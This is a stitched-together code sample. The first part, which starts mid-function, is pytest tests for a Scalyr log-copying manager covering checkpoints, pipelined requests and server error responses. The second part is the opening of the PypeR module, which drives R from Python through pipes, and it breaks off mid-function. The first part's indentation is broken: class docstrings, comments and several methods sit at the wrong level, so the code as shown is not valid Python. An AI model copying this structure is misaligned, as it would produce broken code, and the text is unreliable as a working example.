    # this string will be replaced with invalid utf8 byte after encoding.
    data["test"] = "__replace_me__"
    json_string = scalyr_util.json_encode(data, binary=True)
    # replace prepared substring to invalid byte.
    json_string = json_string.replace(b"__replace_me__", b"\x96")
    with open(path, "wb") as fp:
        fp.write(json_string)
def _write_bad_checkpoint_file(path):
    """
    Write invalid JSON in file located in "path"
    """
    # Bug fix: context manager guarantees the handle is closed even if the
    # write raises (previously a plain open()/close() pair).
    with open(path, "w") as fp:
        fp.write(scalyr_util.json_encode("}data{,:,,{}"))
class TestCopyingManagerEnd2End(CopyingManagerTest):
"""
Initially, those tests were created for the unittest library,
and they are were ported to work on pytest in order to be able to parametrize them to run tests for different
copying manager configurations, such as muti-worker, multi-process workers.
"""
# TODO: Remove those methods and rewrite in pytest style.
# region Those methods are needed to port unittest functions
    def __create_test_instance(
        self, root_dir=None, auto_start=True, use_pipelining=False
    ):
        # Build (or rebuild) a copying manager for a test.
        #
        # With root_dir set, the manager is re-created over an existing
        # directory (checkpoint-restart tests) and the cached log-file/config
        # attributes from the first creation are kept. Otherwise one fresh
        # log file is created and cached on self for the helpers below.
        if root_dir:
            # Reuse existing files; tell _init_manager to create none.
            files_number = None
        else:
            files_number = 1
        files, manager = self._init_manager(
            files_number, auto_start=auto_start, use_pipelining=use_pipelining
        )
        self._manager = manager
        if root_dir:
            return manager
        self._log_file1 = files[0]
        self.__test_log_file = self._log_file1.str_path
        self._config = self._env_builder.config
        return manager
    def __append_log_lines(self, *lines):
        # Append lines to the single log file created in __create_test_instance.
        self._log_file1.append_lines(*lines)
    def __extract_lines(self, request):
        # Pull the raw log lines back out of a captured RPC request.
        return self._extract_lines(request)
    def assertEquals(self, expected, actual):
        # unittest-style shim so the ported tests keep their assertions.
        assert expected == actual
    def assertTrue(self, expr):
        # unittest-style shim over a bare pytest assert.
        assert expr
    def assertFalse(self, expr):
        # unittest-style shim over a bare pytest assert.
        assert not expr
def _file_contains_regex(self, file_path, expression):
matcher = re.compile(expression)
with open(file_path, "r") as fp:
content = fp.read()
return bool(matcher.search(content))
    def assertLogFileDoesntContainsRegex(self, expression, file_path_or_glob):
        """
        Custom assertion function which asserts that the provided log file path doesn't contain a
        string which matches the provided regular expression.
        This function performs checks against the whole file content which means it comes handy in
        scenarios where you need to perform cross line checks.
        :param expression: Regular expression matched against the whole file content.
        :param file_path_or_glob: Path or glob.
        """
        file_paths = scalyr_util.match_glob(file_path_or_glob)
        for file_path in file_paths:
            if self._file_contains_regex(file_path=file_path, expression=expression):
                # Re-read the file so the failure message shows its content.
                with open(file_path, "r") as fp:
                    content = fp.read()
                # NOTE(review): sets a name-mangled flag nothing in this
                # class reads -- presumably consumed by a base class; verify.
                self.__assertion_failed = True
                pytest.fail(
                    'File "%s" contains "%s" expression, but it shouldn\'t.\n\nActual file content: %s'
                    % (file_path, expression, content)
                )
    def assertLogFileContainsRegex(self, expression, file_path_or_glob):
        """
        Custom assertion function which asserts that the provided log file path contains a string
        which matches the provided regular expression.
        This function performs checks against the whole file content which means it comes handy in
        scenarios where you need to perform cross line checks.
        :param expression: Regular expression to match against the whole file content.
        :param file_path_or_glob: Path or glob
        """
        file_paths = scalyr_util.match_glob(file_path_or_glob)
        # for-else: the else branch fails the test only when NO file matched
        # (including the case where the glob matched no files at all).
        for file_path in file_paths:
            if self._file_contains_regex(file_path=file_path, expression=expression):
                break
        else:
            pytest.fail(
                'File "%s" does not contain "%s" expression.'
                % (file_path_or_glob, expression)
            )
# endregion
    def test_single_log_file(self):
        # Two appended lines arrive together in a single AddEvents request.
        manager = self.__create_test_instance()
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = manager.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("success")
    def test_multiple_scans_of_log_file(self):
        # After a successful send, a later append yields a second request
        # containing only the newly added line.
        controller = self.__create_test_instance()
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("success")
        self.__append_log_lines("Third line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(1, len(lines))
        self.assertEquals("Third line", lines[0])
    def test_normal_error(self):
        # On an "error" response the same payload is retransmitted (the
        # third line is not yet included in the retry).
        controller = self.__create_test_instance()
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("error")
        self.__append_log_lines("Third line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
    def test_drop_request_due_to_error(self):
        # "discardBuffer" drops the pending payload; only lines appended
        # afterwards appear in the next request.
        controller = self.__create_test_instance()
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("discardBuffer")
        self.__append_log_lines("Third line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(1, len(lines))
        self.assertEquals("Third line", lines[0])
    def test_request_too_large_error(self):
        # "requestTooLarge" keeps the payload; the retry merges it with any
        # newly appended lines.
        controller = self.__create_test_instance()
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("requestTooLarge")
        self.__append_log_lines("Third line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(3, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        self.assertEquals("Third line", lines[2])
    def test_pipelined_requests(self):
        # With pipelining on, the second scan's request is prepared while
        # the first is in flight and is flagged as pipelined.
        if self.worker_sessions_count * self.workers_count > 1:
            pytest.skip("This test works only on one worker configuration.")
        controller = self.__create_test_instance(use_pipelining=True)
        self.__append_log_lines("First line", "Second line")
        controller.perform_scan()
        self.__append_log_lines("Third line")
        controller.perform_pipeline_scan()
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertFalse(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("success")
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertTrue(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(1, len(lines))
        self.assertEquals("Third line", lines[0])
        responder_callback("success")
    def test_pipelined_requests_with_normal_error(self):
        # An "error" on the first request cancels the pipelined follow-up;
        # the retry is not pipelined, and pipelining resumes after success.
        if self.worker_sessions_count * self.workers_count > 1:
            pytest.skip("This test works only on one worker configuration.")
        controller = self.__create_test_instance(use_pipelining=True)
        self.__append_log_lines("First line", "Second line")
        controller.perform_scan()
        self.__append_log_lines("Third line")
        controller.perform_pipeline_scan()
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertFalse(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("error")
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertFalse(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("success")
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertTrue(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(1, len(lines))
        self.assertEquals("Third line", lines[0])
        responder_callback("success")
    def test_pipelined_requests_with_retry_error(self):
        # "requestTooLarge" on the first request folds the pipelined lines
        # into one combined (non-pipelined) retry.
        if self.worker_sessions_count * self.workers_count > 1:
            pytest.skip("This test works only on one worker configuration.")
        controller = self.__create_test_instance(use_pipelining=True)
        self.__append_log_lines("First line", "Second line")
        controller.perform_scan()
        self.__append_log_lines("Third line")
        controller.perform_pipeline_scan()
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertFalse(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        responder_callback("requestTooLarge")
        (request, responder_callback) = controller.wait_for_rpc()
        self.assertFalse(self.__was_pipelined(request))
        lines = self.__extract_lines(request)
        self.assertEquals(3, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        self.assertEquals("Third line", lines[2])
        responder_callback("success")
    def test_start_from_full_checkpoint(self):
        # Restarting over the same directory resumes from the saved
        # checkpoint; a second restart with artificially-aged checkpoints
        # treats them as stale and skips lines written in between.
        controller = self.__create_test_instance()
        previous_root_dir = os.path.dirname(self.__test_log_file)
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        # stop thread on manager to write checkouts to file.
        controller.stop_manager()
        # write some new lines to log.
        self.__append_log_lines("Third line", "Fourth line")
        # Create new copying manager, but passing previous directory with same log and checkouts.
        # Also starting it manually, to not miss the first "SENDING" state.
        controller = self.__create_test_instance(
            root_dir=previous_root_dir, auto_start=False
        )
        self._manager.start_manager()
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        # thread should continue from saved checkpoint
        self.assertEquals(2, len(lines))
        self.assertEquals("Third line", lines[0])
        self.assertEquals("Fourth line", lines[1])
        # stopping one more time, but now emulating that checkpoint files are stale.
        controller.stop_manager()
        # This lines should be skipped by copying manager.
        self.__append_log_lines("Fifth line", "Sixth line")
        # shift time on checkpoint files to make it seem like the checkpoint was written in the past.
        for worker in self._manager.worker_sessions:
            (
                checkpoints,
                active_chp,
            ) = worker.get_checkpoints()
            checkpoints["time"] -= self._config.max_allowed_checkpoint_age + 1
            active_chp["time"] -= self._config.max_allowed_checkpoint_age + 1
            worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)
            worker.write_checkpoints(worker.get_active_checkpoints_path(), active_chp)
        # also shift time in the consolidated checkpoint file.
        checkpoints = self._manager.consolidated_checkpoints
        checkpoints["time"] -= self._config.max_allowed_checkpoint_age + 1
        self._manager.write_consolidated_checkpoints(checkpoints)
        # create and manager.
        controller = self.__create_test_instance(
            root_dir=previous_root_dir, auto_start=False
        )
        self._manager.start_manager()
        # We are expecting that copying manager has considered checkpoint file as stale,
        # and has skipped "fifth" and "sixth" lines.
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(0, len(lines))
    def test_start_from_active_checkpoint(self):
        # When the consolidated file is gone and the active checkpoints are
        # newer than the full ones, restart resumes from the active ones.
        controller = self.__create_test_instance()
        previous_root_dir = os.path.dirname(self.__test_log_file)
        self.__append_log_lines("First line", "Second line")
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("First line", lines[0])
        self.assertEquals("Second line", lines[1])
        controller.stop_manager()
        # remove the checkpoints file, which should be only one,
        # because it has to clean all other files on stop. From this moment, all checkpoint states are removed
        os.remove(os.path.join(self._config.agent_data_path, "checkpoints.json"))
        # "active_checkpoints" file is used if it is newer than "full_checkpoints",
        # so we read "full_checkpoints" ...
        for worker in self._manager.worker_sessions:
            checkpoints, active_checkpoints = worker.get_checkpoints()
            # ... and make bigger(fresher) time value for "active_checkpoints".
            active_checkpoints["time"] = checkpoints["time"] + 1
            worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)
            worker.write_checkpoints(
                worker.get_active_checkpoints_path(), active_checkpoints
            )
        self.__append_log_lines("Third line", "Fourth line")
        controller = self.__create_test_instance(
            root_dir=previous_root_dir, auto_start=False
        )
        self._manager.start_manager()
        (request, responder_callback) = controller.wait_for_rpc()
        lines = self.__extract_lines(request)
        self.assertEquals(2, len(lines))
        self.assertEquals("Third line", lines[0])
        self.assertEquals("Fourth line", lines[1])
def test_start_without_active_checkpoint(self):
    """When only the per-worker "full" checkpoint files are restored (no
    active checkpoints), copying must still resume where it left off.

    Uses assertEqual instead of the deprecated assertEquals alias.
    """
    controller = self.__create_test_instance()
    previous_root_dir = os.path.dirname(self.__test_log_file)

    self.__append_log_lines("First line", "Second line")
    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    self.assertEqual(2, len(lines))
    self.assertEqual("First line", lines[0])
    self.assertEqual("Second line", lines[1])

    controller.stop_manager()
    self.__append_log_lines("Third line", "Fourth line")

    # remove the checkpoints file, which should be only one,
    # because it has to clean all other files on stop. From this moment, all checkpoint states are removed
    os.remove(os.path.join(self._config.agent_data_path, "checkpoints.json"))

    for worker in self._manager.worker_sessions:
        # get preserved checkpoints from workers and write them once more.
        # we do not write active-checkpoints because it is the purpose of this test.
        checkpoints, _ = worker.get_checkpoints()
        worker.write_checkpoints(worker.get_checkpoints_path(), checkpoints)

    controller = self.__create_test_instance(
        root_dir=previous_root_dir, auto_start=False
    )
    self._manager.start_manager()

    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    self.assertEqual(2, len(lines))
    self.assertEqual("Third line", lines[0])
    self.assertEqual("Fourth line", lines[1])
def test_start_with_bad_checkpoint(self):
    """A checkpoint file containing invalid JSON must be treated as if no
    checkpoint exists: the agent restarts reading from the end of the logs.

    Uses assertEqual instead of the deprecated assertEquals alias.
    """
    # Check totally mangled checkpoint file in the form of invalid JSON, should be treated as not having one at all
    controller = self.__create_test_instance()
    previous_root_dir = os.path.dirname(self.__test_log_file)

    self.__append_log_lines("First line", "Second line")
    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    self.assertEqual(2, len(lines))
    self.assertEqual("First line", lines[0])
    self.assertEqual("Second line", lines[1])

    controller.stop_manager()
    self.__append_log_lines("Third line", "Fourth line")

    _write_bad_checkpoint_file(str(controller.consolidated_checkpoints_path))

    controller = self.__create_test_instance(
        root_dir=previous_root_dir, auto_start=False
    )
    self._manager.start_manager()

    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    # In the case of a bad checkpoint file, the agent should just pretend the checkpoint file does not exist and
    # start reading the logfiles from the end. In this case, that means lines three and four will be skipped.
    self.assertEqual(0, len(lines))
def test_start_with_non_utf8_checkpoint(self):
    """A checkpoint file containing invalid UTF-8 must be treated the same
    as having no checkpoint file at all.

    Uses assertEqual instead of the deprecated assertEquals alias.
    """
    controller = self.__create_test_instance()
    previous_root_dir = os.path.dirname(self.__test_log_file)

    self.__append_log_lines("First line", "Second line")
    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    self.assertEqual(2, len(lines))
    self.assertEqual("First line", lines[0])
    self.assertEqual("Second line", lines[1])

    controller.stop_manager()
    self.__append_log_lines("Third line", "Fourth line")

    _add_non_utf8_to_checkpoint_file(str(controller.consolidated_checkpoints_path))

    controller = self.__create_test_instance(
        root_dir=previous_root_dir, auto_start=False
    )
    self._manager.start_manager()

    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    # In the case of a bad checkpoint file, the agent should just pretend the checkpoint file does not exist and
    # start reading the logfiles from the end. In this case, that means lines three and four will be skipped.
    self.assertEqual(0, len(lines))
def test_generate_status(self):
    """generate_status() must report one matcher per configured log and one
    log processor per test log file.

    Uses assertEqual/assertIn instead of the deprecated assertEquals alias
    and the bare assert (which is stripped under python -O).
    """
    controller = self.__create_test_instance()

    self.__append_log_lines("First line", "Second line")
    (request, responder_callback) = controller.wait_for_rpc()
    lines = self.__extract_lines(request)
    self.assertEqual(2, len(lines))
    self.assertEqual("First line", lines[0])
    self.assertEqual("Second line", lines[1])

    status = self._manager.generate_status()

    self.assertEqual(
        self._env_builder.MAX_NON_GLOB_TEST_LOGS + 1, len(status.log_matchers)
    )

    all_log_processors = {}
    # check if each log file has its own log processor.
    for api_key_status in status.workers:
        for worker_status in api_key_status.sessions:
            for processor_status in worker_status.log_processors:
                all_log_processors[processor_status.log_path] = processor_status

    for test_log in self._env_builder.current_test_log_files:
        self.assertIn(test_log.str_path, all_log_processors)
def test_logs_initial_positions(self):
    """start_manager's logs_initial_positions must make copying begin at the
    given byte offset instead of the beginning of the file.

    Uses assertEqual instead of the deprecated assertEquals alias.
    """
    controller = self.__create_test_instance(
        auto_start=False,
    )

    self.__append_log_lines(*"0123456789")

    # Start copying manager from a 10 byte offset (5 lines * 2 bytes each),
    # so lines "0".."4" must be skipped.
    self._manager.start_manager(
        logs_initial_positions={self.__test_log_file: 5 * 2},
    )

    request, cb = controller.wait_for_rpc()

    lines = self.__extract_lines(request)

    self.assertEqual(["5", "6", "7", "8", "9"], lines)
def test_whole_response_is_logged_on_non_success(self):
    """For every non-success server status, the full response body must be
    written to the agent debug log once the response has been received.

    Uses assertEqual instead of the deprecated assertEquals alias.
    """
    statuses = ["discardBuffer", "requestTooLarge", "parseResponseFailed"]

    self._init_test_environment()

    for status in statuses:
        # Initially this long line shouldn't be present
        expected_body = (
            'Received server response with status="%s" and body: fake' % (status)
        )
        self.assertLogFileDoesntContainsRegex(
            expected_body,
            file_path_or_glob=os.path.join(
                six.text_type(self._env_builder.agent_logs_path), "agent.*log"
            ),
        )

        controller = None
        try:
            controller = self.__create_test_instance()

            self.__append_log_lines("First line", "Second line")
            (request, responder_callback) = controller.wait_for_rpc()
            lines = self.__extract_lines(request)
            self.assertEqual(2, len(lines))
            self.assertEqual("First line", lines[0])
            self.assertEqual("Second line", lines[1])

            responder_callback(status)

            # But after response is received, it should be present
            expected_body = (
                'Received server response with status="%s" and body: fake'
                % (status)
            )
            self.assertLogFileContainsRegex(
                expected_body,
                file_path_or_glob=os.path.join(
                    six.text_type(self._env_builder.agent_logs_path),
                    "agent*_debug.log",
                ),
            )
        finally:
            # Always shut the manager down, even when an assertion failed.
            if controller:
                controller.stop_manager()
def __was_pipelined(self, request):
    """Return True if the first add-events request carries pipeline timing data."""
    timing_data = request[0].get_timing_data()
    return "pipelined=1.0" in timing_data
class FakeMonitor(object):
    """Minimal monitor stand-in exposing only the attributes and hooks that
    the copying manager reads."""

    def __init__(self, monitor_log_config):
        self.module_name = "fake_monitor"
        self.log_config = monitor_log_config

    def set_log_watcher(self, log_watcher):
        # A real monitor would register its log files here; the fake ignores it.
        pass

    def get_extra_server_attributes(self):
        # This fake contributes no extra server attributes.
        return None
class FakeMonitor1(object):
    """Fake monitor that records the global order in which monitors are
    asked for their extra server attributes."""

    order = 0  # class-level counter shared across every instance

    def __init__(self, monitor_log_config, id=None, attribute_key="extra_attrib"):
        self.id = id
        self.module_name = "fake_monitor_{0}".format(id)
        self.log_config = monitor_log_config
        # Set on the first call to get_extra_server_attributes().
        self.access_order = None
        self.attribute_key = attribute_key

    def set_log_watcher(self, log_watcher):
        # No-op: the fake does not register any log files.
        pass

    @property
    def attribute_value(self):
        return "VALUE_{0}".format(self.id)

    def get_extra_server_attributes(self):
        # Record the current value of the shared counter, then advance it.
        self.access_order = FakeMonitor1.order
        FakeMonitor1.order += 1
        return {self.attribute_key: self.attribute_value}
|
#!/usr/bin/env python
'''
PypeR (PYthon-piPE-R)
PypeR is free software subject to the GPL license 3.0 and comes with
ABSOLUTELY NO WARRANTY. This package provides a light-weight interface to use R
in Python by pipe. It can be used on multiple platforms since it is written in
pure python.
Prerequisites:
1. Python 2.3 or later is required.
Usage:
The usage of this packages is very simple. Examples are presented in the
file "test.py" in the distribution package.
PypeR provides a class "R" to wrap the R language. An instance of the R
class is used to manage an R process. Different instances can use different
R installations. On POSIX systems (including the Cygwin environment on
Windows), it is even possible to use an R installed on a remote computer.
Basically, there are four ways to use an instance of the R class.
1. Use the methods of the instance
methods include:
run:This method is used to pass an R command string to the R process,
the return value is a string - the standard output from R. Note
that the return value usually includes the R expression (a
series of R codes) themselves and the output of the R
expression. If the real result value is wanted, use the
function "get" instead.
assign: Assign a value to an R variable. No return value.
get: Get the result of an R expression.
remove: Remove a R variable.
2. Call the instance as a function
The instance is callable. If called as a function, it behaves just
same as its "run" method.
3. Use the instance as a Python dictionary
The instance can mimic some operations on a python dictionary,
typically, to assign values to R variables, to retrieve values for any
R expression, or delete an R variable. These two operations do same
jobs as the methods "assign", "get", and "remove".
4. Access R variables as if they are the attributes of the instance.
If the variable name cannot be found in the instance or its class, the
instance will try to get/set/remove it in R. This way is similar to 3,
but with more limitations, e.g., the R variable name cannot contain any
DOT (.)
Considering that any code block in R is an expression, the "get" method (or
the form of retrieving values from a dictionary) can be used to run a
number of R commands with the final result returned.
Note that PypeR does NOT validate/convert a variable name when passing it to R.
If a variable name with a leading underscore ("_"), although legal in
Python, is passed to R, an RError will be raised.
Conversions:
Python -> R
None -> NULL, NaN -> NaN, Inf -> Inf
R -> Python (numpy)
NULL -> None, NA -> None, NaN -> None (NaN), Inf -> None (Inf)
DEBUG mode:
Since the child process (R) can be easily killed by any occasional error in
the codes passed to it, PypeR is set to "DEBUG" mode by default. This
means that any code blocks sent to R will be wrapped in the function
"try()", which will prevent R from crashing. To disable the "DEBUG" mode,
the user can simply set the variable "_DEBUG_MODE" in the R class or in its
instance to False.
To model the behavior of the "get" method of a Python dictionary, the
method "get" allows default values for variables that do not exist in R.
Then the R expression will always be wrapped in "try()" to avoid R crashing
if the method "get" is called.
'''
# the module "subprocess" requires Python 2.4
import os
import sys
import time
import re
import tempfile
from types import *
__version__ = '1.1.2'
# Compatibility shims so that the same names (set, frozenset, basestring,
# long, unicode, _mybytes, _mystr) exist on Python 2.3 through 3.x.
if sys.version < '2.3':  # actually python >= 2.3 is required by tempfile.mkstemp used in this module !!!
    set = frozenset = tuple
    basestring = str
elif sys.version < '2.4':
    from sets import Set as set, ImmutableSet as frozenset
if sys.version < '3.0':
    # Python 2: str and bytes are the same type, so conversions are identity.
    _mystr = _mybytes = lambda s: s
    _in_py3 = False
else:
    from functools import reduce
    # Map the removed Python 2 names onto their Python 3 equivalents.
    long, basestring, unicode = int, str, str
    _mybytes = lambda s: bytes(s, 'utf8')  # 'ascii')
    _mystr = lambda s: str(s, 'utf8')
    _in_py3 = True
# Optional third-party integrations; absence simply disables the features.
try:
    import pandas
    has_pandas = True
except:
    has_pandas = False
try:
    import numpy
    has_numpy = True
except:
    has_numpy = False
# Platform-specific process plumbing: Popen/sendAll/readLine are defined
# differently for IronPython ('cli'), CPython with subprocess, and very old
# CPython without subprocess (Python 2.3 or older).
_has_subp = False
if sys.platform == 'cli':  # for IronPython
    from System.Diagnostics import Process
    PIPE, _STDOUT = None, None

    def Popen(CMD, *a, **b):
        '''
        CMD is a list - a command and its arguments
        '''
        # Use the .NET Process API with all three standard streams redirected.
        p = Process()
        p.StartInfo.UseShellExecute = False
        p.StartInfo.RedirectStandardInput = True
        p.StartInfo.RedirectStandardOutput = True
        p.StartInfo.RedirectStandardError = True
        p.StartInfo.FileName = CMD[0]
        p.StartInfo.Arguments = ' '.join(CMD[1:])
        p.Start()
        return(p)

    def sendAll(p, s):
        # Write a command string to the child's stdin.
        # remove ending newline since WriteLine will add newline at the end of s!
        if s.endswith('\r\n'):
            s = s[:-2]
        elif s.endswith('\n'):
            s = s[:-1]
        p.StandardInput.WriteLine(_mybytes(s))

    def readLine(p, dump_stdout=False, *a, **b):
        rv = _mystr(p.StandardOutput.ReadLine()) + '\n'  # add newline since ReadLine removed it.
        if dump_stdout:
            sys.stdout.write(rv)
            sys.stdout.flush()
        return(rv)
else:
    try:
        import subprocess
        _has_subp = True
        Popen, PIPE, _STDOUT = subprocess.Popen, subprocess.PIPE, subprocess.STDOUT
    except:  # Python 2.3 or older
        PIPE, _STDOUT = None, None

        def Popen(CMD, *a, **b):
            # Fallback: emulate a Popen-like object on top of os.popen4.
            class A:
                None
            p = A()
            p.stdin, p.stdout = os.popen4(' '.join(CMD))
            return(p)

    def sendAll(p, s):
        # Write a command string to the child's stdin and flush immediately.
        p.stdin.write(_mybytes(s))
        #os.write(p.stdin.fileno(), s)
        p.stdin.flush()

    def readLine(p, dump_stdout=False, *a, **b):
        # Read one line of the child's stdout, optionally echoing it.
        rv = _mystr(p.stdout.readline())
        if dump_stdout:
            sys.stdout.write(rv)
            sys.stdout.flush()
        return(rv)
def NoneStr(obj):
    """Render Python's None as the R literal NULL."""
    return('NULL')
def BoolStr(obj):
    """Render a truthy value as R's TRUE and a falsy one as FALSE."""
    return('TRUE' if obj else 'FALSE')
def ReprStr(obj):
    """Render an object using its Python repr()."""
    text = repr(obj)
    return(text)
if has_numpy:
    def FloatStr(f):
        """Render a float as an R literal, mapping NaN/Inf to R's NaN/Inf.

        The NaN test uses ``f != f`` (true only for NaN) instead of the
        original identity checks against numpy.NaN/numpy.nan, which missed
        computed NaNs and break on numpy >= 2.0 where numpy.NaN was removed.
        """
        if f != f:  # NaN is the only value unequal to itself
            return('NaN')  # or 'NA'
        if has_pandas and pandas.isnull(f):
            return('NaN')
        if numpy.isposinf(f):
            return('Inf')
        if numpy.isneginf(f):
            return('-Inf')
        return(repr(f))
else:
    # Without numpy, special float values are not translated; repr suffices.
    FloatStr = repr
def LongStr(obj):
    """Render a Python long as an R integer literal, dropping any 'L' suffix."""
    text = repr(obj)
    if text.endswith('L'):
        text = text[:-1]
    return(text)
def ComplexStr(obj):
    """Render a complex number for R by swapping Python's 'j' suffix for R's 'i'."""
    text = repr(obj)
    return(text.replace('j', 'i'))
def UniStr(obj):
    """Render a unicode string via the repr of its UTF-8 encoding."""
    encoded = obj.encode('utf8')
    return(repr(encoded))
def ByteStr(obj):
    """Render a bytes value by dropping the leading 'b' of its repr."""
    text = repr(obj)
    return(text[1:])
    #return obj.decode()
def SeqStr(obj, head='c(', tail=')', enclose=True):
    """Convert a Python sequence/set into an R vector ("c(...)") or list.

    A homogeneous sequence of simple scalars becomes an R vector; mixed or
    non-scalar element types fall back to an R "list(...)". Integer-only
    sequences are additionally wrapped in as.integer().

    head/tail: delimiters used when enclose is True.
    enclose: if False, return only the comma-joined elements.
    """
    if not enclose:  # don't add head and tail
        return(','.join(map(Str4R, obj)))
    if not obj:
        return(head + tail)
    # detect types
    if isinstance(obj, set):
        obj = list(obj)
    obj0 = obj[0]
    tp0 = type(obj0)
    simple_types = [str, bool, int, long, float, complex]
    num_types = [int, long, float, complex]
    is_int = tp0 in (int, long)  # token for explicit conversion to integer in R since R treats an integer from stdin as double
    if tp0 not in simple_types:
        head = 'list('
    else:
        # Fix: use the builtin types here. The original referenced StringType/
        # BooleanType from the "types" module, which do not exist on Python 3
        # and raised NameError for string/bool sequences. On Python 2,
        # StringType is str and BooleanType is bool, so behavior is unchanged.
        tps = isinstance(obj0, basestring) and [str] or isinstance(obj0, bool) and [bool] or num_types
        for i in obj[1:]:
            tp = type(i)
            if tp not in tps:
                head = 'list('
                is_int = False
                break
            elif is_int and tp not in (int, long):
                is_int = False
    # convert
    return((is_int and 'as.integer(' or '') + head + ','.join(map(Str4R, obj)) + tail + (is_int and ')' or ''))
def DictStr(obj):
    """Convert a Python dict into an R named list: list(key=value, ...)."""
    pairs = ['%s=%s' % (Str4R(k), Str4R(v)) for k, v in obj.items()]
    return('list(' + ','.join(pairs) + ')')
# Mapping from a numpy dtype "kind" code to the R conversion template used
# by getVec(); unknown kinds fall back to a plain c(%s) / list(%s).
# 'b':boolean, 'i':integer, 'u':unsigned int, 'f':float, c complex-float
# 'S'/'a':string, 'U':unicode, 'V':raw data. 'O':string?
_tpdic = {'i':'as.integer(c(%s))', 'u':'as.integer(c(%s))', 'f':'as.double(c(%s))', 'c':'as.complex(c(%s))',
    'b':'c(%s)', 'S':'c(%s)', 'a':'c(%s)', 'U':'c(%s)', 'V':'list(%s)', 'O':'as.character(c(%s))'}
def getVec(ary):
    """Convert a numpy/pandas array-like into an R vector/list string.

    Multi-dimensional input is flattened first; the dtype kind selects the
    conversion template from _tpdic ('V' record arrays become R lists).
    """
    # used for objects from numpy and pandas
    tp = ary.dtype.kind
    if len(ary.shape) > 1:
        # flatten to 1-D: the new length is the product of all dimensions
        ary = ary.reshape(reduce(lambda a,b=1: a*b, ary.shape))
    ary = ary.tolist()
    if tp != 'V':
        return(_tpdic.get(tp, 'c(%s)') % SeqStr(ary, enclose=False))
    # record array
    ary = list(map(SeqStr, ary))  # each record will be mapped to vector or list
    return(_tpdic.get(tp, 'list(%s)') % (', '.join(ary)))  # use str here instead of repr since it has already been converted to str by SeqStr
def NumpyNdarrayStr(obj):
    """Convert a numpy ndarray to an R vector, data.frame, matrix or array.

    1-D arrays become vectors (1-D record arrays become data.frames), 2-D
    arrays become matrices, and higher ranks become R arrays with the axes
    reordered to match R's layout.
    """
    shp = obj.shape
    if len(shp) == 1:  # to vector
        tp = obj.dtype
        if tp.kind != 'V':
            return(getVec(obj))
        # One-dimension record array will be converted to data.frame
        def mapField(f):
            # render one named field as "name"=<converted values>
            ary = obj[f]
            tp = ary.dtype.kind
            return('"%s"=%s' % (f, _tpdic.get(tp, 'list(%s)') % SeqStr(ary.tolist(), enclose=False)))
        return('data.frame(%s)' % (', '.join(map(mapField, tp.names))))
